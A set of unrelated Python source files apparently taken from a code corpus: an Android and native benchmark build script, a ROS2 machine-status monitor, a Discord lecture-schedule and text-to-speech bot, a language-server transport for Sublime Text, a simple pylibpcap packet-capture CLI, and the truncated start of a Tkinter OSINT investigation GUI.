run_cmd = 'adb shell am start -n "com.acl.decompressor/com.acl.decompressor.MainActivity" -a android.intent.action.MAIN -c android.intent.category.LAUNCHER'
result = subprocess.call(run_cmd, shell=True)
if result != 0:
sys.exit(result)
# Restore working directory
os.chdir(build_dir)
def do_pull_bench_android(build_dir):
# Grab the android directory we wrote the results to
output = str(subprocess.check_output('adb logcat -s acl -e "Benchmark results will be written to:" -m 1 -d'))
matches = re.search('Benchmark results will be written to: ([/\.\w]+)', output)
if matches == None:
print('Failed to find Android source directory from ADB')
android_src_dir = '/storage/emulated/0/Android/data/com.acl.decompressor/files'
print('{} will be used instead'.format(android_src_dir))
else:
android_src_dir = matches.group(1)
# Grab the benchmark results from the android device
dst_filename = os.path.join(build_dir, 'benchmark_results.json')
src_filename = '{}/benchmark_results.json'.format(android_src_dir)
cmd = 'adb pull "{}" "{}"'.format(src_filename, dst_filename)
os.system(cmd)
def do_run_bench_native(build_dir, test_data_dir):
if platform.system() == 'Windows':
bench_exe = os.path.join(os.getcwd(), 'bin/acl_decompressor.exe')
else:
bench_exe = os.path.join(os.getcwd(), 'bin/acl_decompressor')
current_data_dir = os.path.join(test_data_dir, current_decomp_data)
metadata_filename = os.path.join(current_data_dir, 'metadata.sjson')
benchmark_output_filename = os.path.join(build_dir, 'benchmark_results.json')
bench_cmd = '{} -metadata="{}" --benchmark_out={} --benchmark_out_format=json'.format(bench_exe, metadata_filename, benchmark_output_filename)
result = subprocess.call(bench_cmd, shell=True)
if result != 0:
sys.exit(result)
def do_run_bench(build_dir, test_data_dir, args):
if args.compiler == 'ios':
return # Not supported on iOS
print('Running benchmark ...')
if args.compiler == 'android':
do_run_bench_android(build_dir, args)
else:
do_run_bench_native(build_dir, test_data_dir)
if __name__ == "__main__":
args = parse_argv()
build_dir = os.path.join(os.getcwd(), 'build')
test_data_dir = os.path.join(os.getcwd(), 'test_data')
cmake_script_dir = os.path.join(os.getcwd(), 'cmake')
is_clean_requested = args.clean or args.clean_only
if is_clean_requested and os.path.exists(build_dir):
print('Cleaning previous build ...')
shutil.rmtree(build_dir)
if args.clean_only:
sys.exit(0)
if not os.path.exists(build_dir):
os.makedirs(build_dir)
os.chdir(build_dir)
print('Using config: {}'.format(args.config))
print('Using cpu: {}'.format(args.cpu))
if args.compiler:
print('Using compiler: {}'.format(args.compiler))
print('Using {} threads'.format(args.num_threads))
regression_data_dir = do_prepare_regression_test_data(test_data_dir, args)
decomp_data_dir = do_prepare_decompression_test_data(test_data_dir, args)
do_generate_solution(build_dir, cmake_script_dir, regression_data_dir, decomp_data_dir, args)
if args.build:
do_build(args)
if args.convert:
do_convert(test_data_dir, args)
if args.unit_test:
do_tests(build_dir, args)
if args.regression_test and not args.compiler == 'ios':
do_regression_tests(build_dir, test_data_dir, args)
if args.run_bench:
do_run_bench(build_dir, test_data_dir, args)
if args.pull_bench:
do_pull_bench_android(build_dir)
sys.exit(0)
|
rclshark_smi.py | #!/bin/python3
import subprocess
import os
import re
import threading
import sys
import select
import datetime
import rclpy
from rclpy.node import Node
from computer_msgs.msg import PcStatus
from computer_msgs.srv import PcStatusSrv
version_mejor = 1
version_minor = 0
version_revision = 1
version_build = str(version_mejor) + "." + str(version_minor) + "." + str(version_revision)
# ==========================================================
# Call one service
class using_srv(Node):
def __init__(self, _ip:str):
self.ip = _ip
super().__init__('get'+self.ip)
self.sub_pc_0 = 'ip_'+self.ip+'_endcb'
def __dell__(self):
self.destroy_node()
self.get_status.destroy()
del self.req
def reset_client(self) -> bool:
self.get_status = self.create_client(PcStatusSrv, '/'+self.sub_pc_0)
if not self.get_status.service_is_ready():
# self.get_logger().info('service not available')
return 1
self.req = PcStatusSrv.Request()
return 0
def get_by_service(self):
self.req.system_ctrl = 0
self.future = self.get_status.call_async(self.req)
class srv_main:
def __init__(self, _ip:str):
self.ip = _ip
self.ros_class = using_srv(self.ip)
def __dell__(self):
self.ros_class.destroy_node()
def using_srv_fnc(self):
if(self.ros_class.reset_client()):
return -1
self.req = self.ros_class.get_by_service()
if rclpy.ok():
rclpy.spin_once(self.ros_class)
if self.ros_class.future.done():
try:
rclpy.spin_once(self.ros_class)
except Exception:
return -1
return self.ros_class.future.result().callback_status
# ============================-===========================
srv_class_list = list()
ip_list = list()
def show_header():
print("+----------------------------------------------------------------------------+")
print("| RCLSHARK-SMI " + version_build + "\t" + "ROS-DISTRO " + os.environ['ROS_DISTRO'] + "\t\t" + datetime.datetime.now().isoformat(timespec='seconds') + "\t |")
print("|============================================================================|")
print("| username\t\tip_address\tcpu(%)\ttmp(*C)\tmem(%)\t\t |")
print("|============================================================================|")
def show_footer():
print("|============================================================================|")
print("| Press 'q'-> Enter Key to quit |")
print("+----------------------------------------------------------------------------+")
def get_data_list() -> list:
global srv_class_list
global ip_list
ip_list = get_ip_list()
# append ip_list to srv_list
if(len(ip_list) > len(srv_class_list)):
srv_class_list.clear()
for i in ip_list:
srv_class_list.append(srv_main(i))
ip_list, data = get_from_srv(srv_class_list, ip_list)
return data
def show_data():
terminal_col = 5
for i in range(3):
input_data = get_data_list()
try:
for data in input_data:
ip_data = int(data.ip_address.split(".")[3])
data.local_tag = ip_data
for data in sorted(input_data, reverse=False, key=lambda x: x.local_tag):
print_status = "| "+ data.user_name + "\t\t" + data.ip_address + "\t" + str(data.cpu_percent).rjust(5) + "\t" + str(data.core_temp).rjust(5) + "\t" + str(data.mem_percent).rjust(5) + "\t\t" + " |"
print(print_status)
terminal_col = terminal_col + 1
for i in range(20 - terminal_col):
print("|\t\t\t\t\t\t\t\t\t |")
except:
flag = 1
def get_from_srv(_srv_list:list, _ip_list:list):
# get data from srv_list
data_recieve = list()
for i in range(len(_srv_list)):
try:
out = _srv_list[i].using_srv_fnc()
if(out == -1):
_ip_list.remove(_srv_list[i].ip)
data_recieve.append(out)
except:
pass
return _ip_list, data_recieve
def get_ip_list() -> list:
try:
return re.findall("/ip_(.*)_end", str(subprocess.run(["ros2" , "node" , "list"], capture_output=True).stdout))[0].split("_end\\n/ip_")
except:
return []
def loop():
show_header()
show_data()
show_footer()
def input_timeout(timeout=10):
(ready, _, _) = select.select([sys.stdin], [], [], timeout)
if ready:
return sys.stdin.readline().rstrip('\n')
else:
return ''
def ros_main(args = None):
global ip_list
global srv_list
rclpy.init(args=args)
t = threading.Thread(target=loop,args=())
t.setDaemon(True)
t.start()
t.join()
del t
# while rclpy.ok():
# t = threading.Thread(target=loop,args=())
# t.setDaemon(True)
# t.start()
# t.join(timeout=5.0)
# if t.is_alive():
# print("Timeout Error")
# exit(1)
# if input_timeout(0.1) == 'q':
# print("quit")
# srv_class_list.clear()
# exit(0)
# del t
rclpy.shutdown()
if __name__=='__main__':
ros_main() |
kurisu.py | #!/usr/bin/env python3.8
import asyncio
import discord
import environs
import googletrans
import gtts
import json
import os
import pykakasi
import random
import requests
import schedule
import threading
import time
from datetime import datetime, timedelta
def are_same_day(date1, date2):
return (date1.replace(hour=0, minute=0, second=0, microsecond=0) - date2.replace(hour=0, minute=0, second=0, microsecond=0)).days == 0
def delete_if_exists(filename):
try:
os.unlink(filename)
except FileNotFoundError:
pass
def translate_italian_to_japanese(text):
translator = googletrans.Translator()
return translator.translate(text, src='it', dest='ja').text
def japanese_to_romaji(text):
kakasi = pykakasi.kakasi()
kakasi.setMode('H', 'a')
kakasi.setMode('K', 'a')
kakasi.setMode('J', 'a')
kakasi.setMode('s', True)
conv = kakasi.getConverter()
return conv.do(text)
def create_voice(text, outfile, lang='ja'):
tts = gtts.gTTS(text=text, lang=lang)
tts.save(outfile)
class Scraper(object):
def __init__(self, url):
self.url = url
self.dateformat = '%Y-%m-%dT%H:%M:%S'
def scrape(self):
res = requests.get(self.url)
data = json.loads(res.text)
now = datetime.now()
return list(filter(lambda e: e['start'] > now, (map(lambda event: {
'module_code': event['cod_modulo'],
'start': datetime.strptime(event['start'], self.dateformat),
'end': datetime.strptime(event['end'], self.dateformat),
'title': event['title'],
'teams_link': event['teams'],
'note': event['note'],
'prof': event['docente'],
'time': event['time']
}, data))))
class KurisuBot(discord.Client):
def __init__(self, notify_channel, offset):
super(KurisuBot, self).__init__()
self.voice_client = None
self.hour_offset = offset
self.notify_channel = notify_channel
self.scrapers = [Scraper('https://corsi.unibo.it/laurea/fisica/orario-lezioni/@@orario_reale_json?anno=1&curricula='),
Scraper('https://corsi.unibo.it/laurea/fisica/orario-lezioni/@@orario_reale_json?anno=2&curricula='),
Scraper('https://corsi.unibo.it/laurea/fisica/orario-lezioni/@@orario_reale_json?anno=3&curricula=')]
self.stop_event = threading.Event()
self.quotes = [
'I don\'t want to deny who I\'ve been. Because even my failures are a part of who I am today',
'Something must be wrong for you to use my actual name',
'Say it right, Hououin Pervert-Kyouma!',
'People\'s feelings are memories that transcend time',
'Who\'ll eat a pervert\'s banana anyway?',
'It looks like you\'re both perverts',
'There was a scientific rationale for that! Because... important memories, including, but not limited to, one\'s first kiss, are stored in the hippocampus, which makes them harder to forget',
'Time is passing so quickly. Right now, I feel like complaining to Einstein. Whether time is slow or fast depends on perception. Relativity theory is so romantic. And so sad',
'I\'ve only lived 18 years, but I don\'t want to change any of them. They\'re all part of my life, even the failures',
'You\'ve pretty much figured it all out by now, right? That there is no absolute justice in this world. The opposite of justice is... another justice. Choosing the past through Time Leaps is just choosing between these justices. Can you say that your justice is correct?',
'99.9% of science is boring'
]
def scheduler_timer():
while not self.stop_event.is_set():
schedule.run_pending()
time.sleep(10)
self.scheduler_thread = threading.Thread(target=scheduler_timer)
def _create_daily_embed(self, daily_events, channel):
if not daily_events:
return
embed = discord.Embed()
day = daily_events[0]['start'].strftime('%A')
embed.add_field(name='Title', value=f'{day}\'s schedule', inline=False)
for event in daily_events:
title = event['title'].split('/')[0]
embed.add_field(name='Course', value=title, inline=True)
embed.add_field(name='Prof.', value=event['prof'], inline=True)
embed.add_field(name='Time', value=event['time'], inline=True)
embed.add_field(name='Teams', value=f'[Click!]({event["teams_link"]})', inline=False)
return embed
async def _play_audio(self, voice_channel, audio):
if not self.voice_client or not self.voice_client.is_connected():
self.voice_client = await voice_channel.connect()
else:
while self.voice_client.is_playing():
await asyncio.sleep(1)
if not self.voice_client.channel.name == voice_channel.name:
await self.voice_client.move_to(voice_channel)
self.voice_client.play(audio)
async def _wait_if_playing(self):
if self.voice_client:
while self.voice_client.is_playing():
await asyncio.sleep(1)
async def _quote_command(self, channel, args, user):
await channel.send(random.choice(self.quotes))
async def _rus_command(self, channel, args, user):
if len(args) < 2:
await channel.send('Usage: -rus <sentence>')
return
if not user.voice:
await channel.send('You have to be in a voice channel to use this command! BAKA')
return
voice_channel = user.voice.channel
await self._wait_if_playing()
delete_if_exists('audio.mp3')
create_voice(' '.join(args[1:]), 'audio.mp3', lang='ru')
await self._play_audio(voice_channel, discord.FFmpegPCMAudio('audio.mp3'))
async def _jap_command(self, channel, args, user):
if len(args) < 2:
await channel.send('Usage: -jap <sentence>')
return
if not user.voice:
await channel.send('You have to be in a voice channel to use this command! BAKA')
return
voice_channel = user.voice.channel
await self._wait_if_playing()
delete_if_exists('audio.mp3')
create_voice(' '.join(args[1:]), 'audio.mp3')
await self._play_audio(voice_channel, discord.FFmpegPCMAudio('audio.mp3'))
async def _calendar_command(self, channel, args, user):
days = 7
index = 2
if len(args) > 2:
options = ['first', 'second', 'third']
try:
index = options.index(args[2])
except ValueError:
await channel.send('Usage: -calendar [number_of_days] [first/second/third]')
return
if len(args) > 1:
try:
days = int(args[1])
except ValueError:
await channel.send('Usage: -calendar [number_of_days] [first/second/third]')
return
events = self.scrapers[index].scrape()
await channel.send(f'Lectures of the next {days} days')
now = datetime.now()
then = now + timedelta(days=days)
events = list(filter(lambda event: event['start'] < then, events))
if not events:
await channel.send('I didn\'t find any lessons')
days_list = [now + timedelta(days=i) for i in range(days)]
groups = [[e for e in events if are_same_day(e['start'], d)] for d in days_list]
for group in groups:
if group:
await channel.send(embed=self._create_daily_embed(group, channel))
async def _tj_command(self, channel, args, user):
if len(args) < 2:
await channel.send('Usage: -tj <sentence in italian>')
return
text = translate_italian_to_japanese(' '.join(args[1:]))
await channel.send(f'Kanji: {text}\nRomaji: {japanese_to_romaji(text)}')
async def _tjsay_command(self, channel, args, user):
if len(args) < 2:
await channel.send('Usage: -tjsay <sentence in italian>')
return
if not user.voice:
await channel.send('You have to be in a voice channel BAKA')
return
voice_channel = user.voice.channel
await self._wait_if_playing()
delete_if_exists('audio.mp3')
create_japanese_voice(translate_italian_to_japanese(' '.join(args[1:])), 'audio.mp3')
await self._play_audio(voice_channel, discord.FFmpegPCMAudio('audio.mp3'))
async def _kuristina_command(self, channel, args, user):
if not user.voice:
await channel.send('You have to be in a voice channel BAKA')
return
voice_channel = user.voice.channel
await self._play_audio(voice_channel, discord.FFmpegPCMAudio('audio/KURISUTINA.mp3'))
async def _tutturu_command(self, channel, args, user):
if not user.voice:
await channel.send('You have to be in a voice channel BAKA')
return
voice_channel = user.voice.channel
tutturus = ['audio/OKARIN.mp3', 'audio/DESU.mp3']
await self._play_audio(voice_channel, discord.FFmpegPCMAudio(random.choice(tutturus)))
async def on_message(self, message):
if message.author == self.user:
return
if message.content.startswith('-'):
# got a command, parse it
args = message.content.split(' ')
if args[0] == '-quote':
await self._quote_command(message.channel, args, message.author)
if args[0] == '-calendar':
await self._calendar_command(message.channel, args, message.author)
if args[0] == '-jap':
await self._jap_command(message.channel, args, message.author)
if args[0] == '-rus':
await self._rus_command(message.channel, args, message.author)
if args[0] == '-tj':
await self._tj_command(message.channel, args, message.author)
if args[0] == '-tjsay':
await self._tjsay_command(message.channel, args, message.author)
if args[0] == '-kuristina':
await self._kuristina_command(message.channel, args, message.author)
if args[0] == '-tutturu':
await self._tutturu_command(message.channel, args, message.author)
async def on_ready(self):
print('Kurisu ready uwu')
self._update_schedule()
schedule.every().day.at('00:00').do(self._update_schedule)
def _notify_lecture(self, event):
embed = discord.Embed()
title = event['title'].split('/')[0]
embed.add_field(name='Course', value=title, inline=True)
embed.add_field(name='Prof', value=event['prof'], inline=True)
embed.add_field(name='Time', value=event['time'], inline=True)
embed.add_field(name='Teams', value=f'[Click!]({event["teams_link"]})')
asyncio.run_coroutine_threadsafe(self.get_channel(self.notify_channel).send(embed=embed), self.loop)
asyncio.run_coroutine_threadsafe(self.get_channel(self.notify_channel).send('@everyone'), self.loop)
def _update_schedule(self):
print('Updating daily schedule')
schedule.clear('daily_events')
then = (datetime.now() + timedelta(days=1)).replace(hour=0, minute=0, second=0, microsecond=0)
daily_events = filter(lambda e: e['start'] < then, self.scrapers[2].scrape())
for event in daily_events:
# this should really be done using UTC timestamps tbh
hour = (event['start'] - timedelta(hours=self.hour_offset, minutes=10)).strftime('%H:%M')
schedule.every().day.at(hour).do(
self._notify_lecture, event
).tag('daily_events')
print(f'Scheduled {event["title"]} at {hour}')
def run(self, token):
print('Starting Kurisu')
self.scheduler_thread.start()
if not discord.opus.is_loaded():
discord.opus.load_opus('opus/lib/libopus.so.0')
super(KurisuBot, self).run(token)
if __name__ == '__main__':
env = environs.Env()
env.read_env()
kurisu = KurisuBot(int(env('NOTIFY_CHANNEL')), int(env('HOUR_OFFSET')))
kurisu.run(env('DISCORD_TOKEN'))
|
transports.py | from .logging import exception_log, debug
from .types import ClientConfig
from .typing import Dict, Any, Optional, IO, Protocol
from abc import ABCMeta, abstractmethod
from contextlib import closing
from queue import Queue
import json
import os
import shutil
import socket
import sublime
import subprocess
import threading
import time
import weakref
TCP_CONNECT_TIMEOUT = 5
class Transport(metaclass=ABCMeta):
@abstractmethod
def send(self, payload: Dict[str, Any]) -> None:
pass
@abstractmethod
def close(self) -> None:
pass
class TransportCallbacks(Protocol):
def on_transport_close(self, exit_code: int, exception: Optional[Exception]) -> None:
...
def on_payload(self, payload: Dict[str, Any]) -> None:
...
def on_stderr_message(self, message: str) -> None:
...
class JsonRpcTransport(Transport):
def __init__(self, name: str, process: subprocess.Popen, socket: Optional[socket.socket], reader: IO[bytes],
writer: IO[bytes], stderr: Optional[IO[bytes]], callback_object: TransportCallbacks) -> None:
self._closed = False
self._process = process
self._socket = socket
self._reader = reader
self._writer = writer
self._stderr = stderr
self._reader_thread = threading.Thread(target=self._read_loop, name='{}-reader'.format(name))
self._writer_thread = threading.Thread(target=self._write_loop, name='{}-writer'.format(name))
self._stderr_thread = threading.Thread(target=self._stderr_loop, name='{}-stderr'.format(name))
self._callback_object = weakref.ref(callback_object)
self._send_queue = Queue(0) # type: Queue[Optional[Dict[str, Any]]]
self._reader_thread.start()
self._writer_thread.start()
self._stderr_thread.start()
def send(self, payload: Dict[str, Any]) -> None:
self._send_queue.put_nowait(payload)
def close(self) -> None:
if not self._closed:
self._send_queue.put_nowait(None)
if self._socket:
self._socket.close()
self._closed = True
def _join_thread(self, t: threading.Thread) -> None:
if t.ident == threading.current_thread().ident:
return
try:
t.join(2)
except TimeoutError as ex:
exception_log("failed to join {} thread".format(t.name), ex)
def __del__(self) -> None:
self.close()
self._join_thread(self._writer_thread)
self._join_thread(self._reader_thread)
self._join_thread(self._stderr_thread)
def _read_loop(self) -> None:
try:
while self._reader:
line = self._reader.readline()
if not line:
break
try:
num_bytes = _content_length(line)
except ValueError:
continue
if num_bytes is None:
continue
while line and line.strip():
line = self._reader.readline()
if not line:
continue
body = self._reader.read(num_bytes)
callback_object = self._callback_object()
if callback_object:
try:
callback_object.on_payload(_decode(body))
except Exception as ex:
exception_log("Error handling payload", ex)
else:
break
except (AttributeError, BrokenPipeError):
pass
except Exception as ex:
exception_log("Unexpected exception", ex)
self._send_queue.put_nowait(None)
def _end(self, exception: Optional[Exception]) -> None:
exit_code = 0
if not exception:
try:
# Allow the process to stop itself.
exit_code = self._process.wait(1)
except (AttributeError, ProcessLookupError, subprocess.TimeoutExpired):
pass
if self._process:
try:
# The process didn't stop itself. Terminate!
self._process.kill()
# still wait for the process to die, or zombie processes might be the result
# Ignore the exit code in this case, it's going to be something non-zero because we sent SIGKILL.
self._process.wait()
except (AttributeError, ProcessLookupError):
pass
except Exception as ex:
exception = ex # TODO: Old captured exception is overwritten
callback_object = self._callback_object()
if callback_object:
callback_object.on_transport_close(exit_code, exception)
self.close()
def _write_loop(self) -> None:
exception = None # type: Optional[Exception]
try:
while self._writer:
d = self._send_queue.get()
if d is None:
break
body = _encode(d)
self._writer.writelines(("Content-Length: {}\r\n\r\n".format(len(body)).encode('ascii'), body))
self._writer.flush()
except (BrokenPipeError, AttributeError):
pass
except Exception as ex:
exception = ex
self._end(exception)
def _stderr_loop(self) -> None:
try:
while self._stderr:
if self._closed:
# None message already posted, just return
return
message = self._stderr.readline().decode('utf-8', 'replace')
if message == '':
break
callback_object = self._callback_object()
if callback_object:
callback_object.on_stderr_message(message.rstrip())
else:
break
except (BrokenPipeError, AttributeError):
pass
except Exception as ex:
exception_log('unexpected exception type in stderr loop', ex)
self._send_queue.put_nowait(None)
def create_transport(config: ClientConfig, cwd: Optional[str], window: sublime.Window,
callback_object: TransportCallbacks, variables: Dict[str, str]) -> JsonRpcTransport:
tcp_port = None # type: Optional[int]
if config.tcp_port is not None:
tcp_port = _find_free_port() if config.tcp_port == 0 else config.tcp_port
if tcp_port is not None:
variables["port"] = str(tcp_port)
args = sublime.expand_variables(config.command, variables)
args = [os.path.expanduser(arg) for arg in args]
if tcp_port is not None:
# DEPRECATED -- replace {port} with $port or ${port} in your client config
args = [a.replace('{port}', str(tcp_port)) for a in args]
env = os.environ.copy()
for var, value in config.env.items():
env[var] = sublime.expand_variables(value, variables)
if tcp_port is not None:
stdout = subprocess.DEVNULL
stdin = subprocess.DEVNULL
else:
stdout = subprocess.PIPE
stdin = subprocess.PIPE
if sublime.platform() == "windows":
startupinfo = subprocess.STARTUPINFO() # type: ignore
startupinfo.dwFlags |= subprocess.SW_HIDE | subprocess.STARTF_USESHOWWINDOW # type: ignore
executable_arg = args[0]
fname, ext = os.path.splitext(executable_arg)
if len(ext) < 1:
path_to_executable = shutil.which(executable_arg)
# what extensions should we append so CreateProcess can find it?
# node has .cmd
# dart has .bat
# python has .exe wrappers - not needed
for extension in ['.cmd', '.bat']:
if path_to_executable and path_to_executable.lower().endswith(extension):
args[0] = executable_arg + extension
break
else:
startupinfo = None
debug("starting {} in {}".format(args, cwd if cwd else os.getcwd()))
process = subprocess.Popen(
args=args,
stdin=stdin,
stdout=stdout,
stderr=subprocess.PIPE,
startupinfo=startupinfo,
env=env,
cwd=cwd)
_subprocesses.add(process)
sock = None # type: Optional[socket.socket]
if tcp_port:
sock = _connect_tcp(tcp_port)
if sock is None:
raise RuntimeError("Failed to connect on port {}".format(config.tcp_port))
reader = sock.makefile('rwb') # type: IO[bytes]
writer = reader
else:
reader = process.stdout # type: ignore
writer = process.stdin # type: ignore
return JsonRpcTransport(config.name, process, sock, reader, writer, process.stderr, callback_object)
_subprocesses = weakref.WeakSet() # type: weakref.WeakSet[subprocess.Popen]
def kill_all_subprocesses() -> None:
global _subprocesses
subprocesses = list(_subprocesses)
for p in subprocesses:
try:
p.kill()
except Exception:
pass
for p in subprocesses:
try:
p.wait()
except Exception:
pass
def _connect_tcp(port: int) -> Optional[socket.socket]:
start_time = time.time()
while time.time() - start_time < TCP_CONNECT_TIMEOUT:
try:
return socket.create_connection(('localhost', port))
except ConnectionRefusedError:
pass
return None
def _find_free_port() -> int:
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
s.bind(('', 0))
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
return s.getsockname()[1]
def _encode(d: Dict[str, Any]) -> bytes:
return json.dumps(d, sort_keys=False, check_circular=False, separators=(',', ':')).encode('utf-8')
def _decode(message: bytes) -> Dict[str, Any]:
return json.loads(message.decode('utf-8'))
def _content_length(line: bytes) -> Optional[int]:
if line.startswith(b'Content-Length: '):
_, value = line.split(b'Content-Length: ')
value = value.strip()
try:
return int(value)
except ValueError as ex:
raise ValueError("Invalid Content-Length header: {}".format(value.decode('ascii'))) from ex
return None
|
networkSniffer.py | import os
import threading
import time
import netifaces
from pylibpcap import sniff
from prettytable import PrettyTable
ns_options_list = ['show', 'help', 'start', 'stop']
ns_help = 'This is a network sniffer tool designed to record the network packets. \n Press \'help\' to get more ' \
'information about this tool......... \n Use following commands for network sniffing : \n start : to ' \
'start the network sniffing \n set : to set values of parameters' \
'\n stop : to end the network sniffing \n show : to display set values of parameters' \
'\n Use following parameter to pass with \'start\' commands :\n' \
' -o <path> : to pass the output path for file\n -t <seconds>: to stop the sniffing after given time' \
'\n -d : to display the sniffing on console\n -v : to verbose the logs\n -i : to pass the ' \
'network interface \n Use set (o/t/d/v/i) <value> to set the parameters. \n set d true i eth0'
params = {}
ns_start_params_list = ['o', 't', 'd', 'v', 'i']
ns_invalid_input_error = 'Invalid input !!!!...... Use \'help\' to get more information.'
ns_invalid_param_error = 'Invalid parameter !!!! Use \'help\' to get more information.'
ns_invalid_path_error = 'Invalid output path !!!! Use \'help\' to get more information.'
ns_invalid_interface_error = 'Invalid interface !!!! Use \'help\' to get more information.'
# Default values for the parameters
ns_verbose_status = 'false'
ns_display_status = 'false'
ns_stop_status = False
BUFFER_SIZE = 65565
file = 'network_data.pcap'
output_path = '/usr/local/bin/'
interface = 'eth0'
time_duration = 10
def ns_display():
display_table = PrettyTable(['Parameters', 'Values'])
display_table.add_row(['Interface', params['i']])
display_table.add_row(['Output Path', params['o']])
display_table.add_row(['Time <in secs>', params['t']])
display_table.add_row(['Verbose', params['v']])
display_table.add_row(['Display Sniffing', params['d']])
print(display_table)
def default_params():
global params
params['o'] = output_path
params['t'] = time_duration
params['d'] = ns_display_status
params['v'] = ns_verbose_status
params['i'] = interface
def set_params(input_str):
error_status = False
input_str = input_str[3:len(input_str)].strip()
if input_str:
param_list = input_str.split(' ')
count = 0
while count < len(param_list) and count+1 < len(param_list):
if param_list[count] in ns_start_params_list and validate_param_type(param_list[count],
param_list[count + 1]):
params[param_list[count]] = param_list[count + 1]
else:
error_status = True
count += 2
if error_status:
print(ns_invalid_input_error)
def sniffer():
default_params()
input_status = True
while input_status:
input_str = input('network-sniffer> ')
if input_str == 'exit':
input_status = False
elif input_str[0:5] == 'start' and validate_args_param(input_str):
start_sniffer()
elif input_str[0:3] == 'set':
set_params(input_str)
elif input_str == 'stop':
stop_sniffer()
elif input_str == 'help':
print(ns_help)
elif input_str == 'show':
ns_display()
elif input_str != '' and input_str not in ns_options_list:
print(ns_invalid_input_error)
else:
pass
# This module will validate the type of input params
def validate_param_type(param, value):
try:
if (param == 'i' and value in netifaces.interfaces()) or \
(param == 'o' and os.path.exists(value)) or \
(param == 't' and int(value)) or \
((param == 'v' or param == 'd') and value.lower() in ('t', 'f', 'true', 'false', '1', '0')):
return True
else:
return False
except:
return False
# This module will check the validity of entered parameters
def validate_args_param(input_str):
global params
status = True
input_str = input_str[5:len(input_str)].strip()
if input_str:
param_list = input_str.split('-')
for param in param_list:
if param:
param_pair = param.strip().split(' ')
if param_pair[0] in ns_start_params_list and len(param_pair) == 2 and \
validate_param_type(param_pair[0].strip(), param_pair[1].strip()):
params[param_pair[0].strip()] = param_pair[1].strip()
else:
print(ns_invalid_param_error)
status = False
break
return status
def validate_params():
validate = True
if params['i'] not in netifaces.interfaces():
print('Interface is not valid')
validate = False
if not os.path.exists(params['o']):
print('Output path is not exist')
validate = False
if not int(params['t']):
print('Sniffing time is not valid')
validate = False
if params['v'] not in ('t', 'f', 'true', 'false', '1', '0'):
print('Verbose state is not valid')
validate = False
if params['d'] not in ('t', 'f', 'true', 'false', '1', '0'):
print('Display state is not valid')
validate = False
return validate
# Define a function for the thread for network sniffing
def network_sniff():
current_time = time.time()
if params['v'] in ('t', 'True', '1'):
print("Starting Network Sniffing.....")
for plen, t, buf in sniff(params['i'], count=-1, promisc=1, out_file=params['o'] + file):
if params['d'] in ('t', 'True', '1'):
print(buf)
if time.time() > current_time + params['t'] or ns_stop_status:
if params['v'] in ('t', 'True', '1'):
print("Network Sniffing completed....")
break
# Define a function for network sniffing
def start_sniffer():
if validate_params():
try:
# lock = threading.Lock();
x = threading.Thread(target=network_sniff, args=(), daemon=True)
x.start()
print("network-sniffer>")
except:
print('Network Sniffing Failed')
# Define a function to stop network sniffing
def stop_sniffer():
global ns_stop_status
ns_stop_status = True
|
pockint.py | #!/usr/bin/env python
import datetime
from threading import Thread
import tkinter as tk
from tkinter import messagebox
import tkinter.ttk as ttk
from utils import InputValidator, Database, load_icon, callback
import sys
__version__ = '1.2.0'
class CreditsTool(tk.Toplevel):
"""Opens a new window providing credits"""
def __init__(self, master=None, *args, **kwargs):
"""Initializes Toplevel object and builds credit interface."""
super().__init__(master, *args, **kwargs)
# hide window in background during drawing and load, to prevent flickering and glitches during frame load
self.withdraw()
# build and draw the window
self.build()
# unhide the Toplevel window immediately after draw and load
self.after(0, self.deiconify)
def build(self):
"""Initializes and builds application widgets."""
text_credits = 'POCKINT\nversion {ver}\n copyright © {year}' \
''.format(year=datetime.datetime.now().year,
ver=__version__)
author_info = "Written with ♥ by\nNetEvert"
# create main credits label
self.lbl_info = tk.Label(self, text=text_credits,
font=('courier', 10, 'normal'))
self.lbl_author = tk.Label(self, text=author_info,
font=('courier', 10, 'normal'), cursor="hand2")
self.lbl_info.grid(row=0, column=0, sticky='w', padx=1, pady=1)
self.lbl_author.grid(row=1, column=0, sticky='w', padx=1, pady=1)
self.lbl_author.bind("<Button-1>", lambda e: callback("https://twitter.com/netevert"))
class SaveTool(tk.Toplevel):
"""Opens a window to store investigation data"""
def __init__(self, master=None, investigation_id=None, data=None, *args, **kwargs):
"""Initializes Toplevel object and builds interface"""
super().__init__(master, *args, **kwargs)
# initialize variables
self.investigation_id = investigation_id
self.data = data
# initialize database
self.db_handler = Database()
# hide window in background during drawing and load, to prevent flickering and glitches during frame load
self.withdraw()
# build and draw the window
self.build()
# unhide the Toplevel window immediately after draw and load
self.after(0, self.deiconify)
def build(self):
"""Initializes and builds application widgets"""
# create input labelframe
labelframe_1 = tk.LabelFrame(self, fg='brown')
labelframe_1.pack(side="top", expand='yes', fill='both', padx=2, pady=2, anchor="n")
# create explanation label
self.label = tk.Label(labelframe_1, text='Save As...')
self.label.pack(expand=True, fill='x', side="left", padx=2, pady=2)
# create data input entry widget
self.entry = tk.Entry(labelframe_1)
self.entry.pack(expand=True, fill='x', side="left", padx=2, pady=2)
# create save button
self.save_button = tk.Button(labelframe_1, text="Save", command=self.save_data)
self.save_button.pack(expand=False, side="left", padx=2, pady=2, anchor="e")
# create cancel button
self.cancel_button = tk.Button(labelframe_1, text="Cancel", command=self.quit_save)
self.cancel_button.pack(expand=False, side="left", padx=2, pady=2, anchor="e")
self.entry.insert(0, self.investigation_id)
def save_data(self):
"""Stores investigation data within database"""
if self.data:
try:
self.db_handler.store_investigation(self.entry.get(), self.data)
messagebox.showinfo("Success", "Successfully saved investigation")
self.quit_save()
except Exception:
messagebox.showerror("Error saving data", "Failed to save data!")
self.quit_save()
else:
messagebox.showinfo("No data", "There is no data to save")
def quit_save(self):
"""Quits the save window"""
self.db_handler.close_connection()
self.destroy()
class OpenTool(tk.Toplevel):
"""Opens a window to retrieve investigation data"""
def __init__(self, master=None, *args, **kwargs):
"""Initializes Toplevel object and builds interface"""
super().__init__(master, *args, **kwargs)
# initialize variables
self.selection = tk.StringVar(self)
# initialize database
self.db_handler = Database()
# hide window in background during drawing and load, to prevent flickering and glitches during frame load
self.withdraw()
# build and draw the window
self.build()
# unhide the Toplevel window immediately after draw and load
self.after(0, self.deiconify)
def build(self):
"""Initializes and builds application widgets"""
# create input labelframe
labelframe_1 = tk.LabelFrame(self, fg='brown')
labelframe_1.pack(side="top", expand='yes', fill='both', padx=2, pady=2, anchor="n")
# create explanation label
